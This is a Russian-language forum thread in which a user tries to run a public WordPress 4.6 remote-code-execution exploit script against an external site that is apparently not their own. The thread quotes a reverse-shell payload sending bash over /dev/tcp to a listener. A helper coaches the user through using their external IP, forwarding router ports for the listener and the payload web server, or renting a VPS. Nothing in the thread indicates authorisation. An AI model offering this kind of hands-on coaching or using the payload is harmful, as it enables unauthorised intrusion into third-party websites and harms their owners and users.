Хочу проэксплуатировать WP 4.6 Remote Code Execution.
Сам сплойт: https://exploitbox.io/exploit/wordpress-rce-exploit.sh.
Есть сайт нужной версии, в системе есть netcat.
При запуске: ./wordpress-rce-exploit.sh site.com я вижу в консоли какой-то HTML и просто всё подвисает, нет сообщения о неудачное эксплуатации и т.д. А рядом создаётся файл rce.txt с содержимым:
(sleep 3s && nohup bash -i >/dev/tcp/192.168.57.1/1337 0&1) &

Что я делаю не так и как правильно проэксплуатировать

Ага! Среди кучи HTML-я заметил это:

• Listening on 0.0.0.0 1337

В скрипте я вписал свой IP rev_host="192.168.0.4", именно этот адресс указан в веб-морде роутера

Если ты пробиваешь внешний сайт (не из твоей локалки), то нужно указывать свой внешний айпишник + пробросить порты на роутере (один для веб сервера, который поднимается питоном - 80 и один для шелла - 1337).
Либо юзать какой-то промежуточный VPS/VDS.

Да. Сайт не из моей локали

А не подскажите по пробросу, я просто никогда этого не делал... Как правильно это сделать?
У меня сейчас так:

Порт сервисаIP-адресВнутренний портПротоколСостояниеИзме нить

1337192.168.0.41337TCP или UDPВключеноИзменить

Я на правильном пути?

Похоже.
Дальше в эксплоите свой внешний айпишник используй. Если не прокатит, то есть вероятность того, что на твоём провайдере такое не заработает. Тогда копать в сторону VPS/VDS.

А 80 я не могу пробросить: Ошибка: Порт удалённого управления веб-интерфейсом конфликтует с портом виртуального сервера.

Поправь порт, на котором будет слушать веб сервер на питоне и откуда будет забирать файл эксполоит.

Не-е-е... та же ошибка...

Код:


Сейчас проброс выглядит так:

Порт сервисаIP-адресВнутренний портПротоколСостояниеИзме нить

1337192.168.0.41337TCP или UDPВключеноИзменить81192.168.0.481 TCP или UDPВключеноИзменить

Ничего не смущает?

Тебе в скрипте нужно поправить:

на твой внешний айпишник
И тут
заменить порт на 81.

Та это я-то сделал. Результат тот же.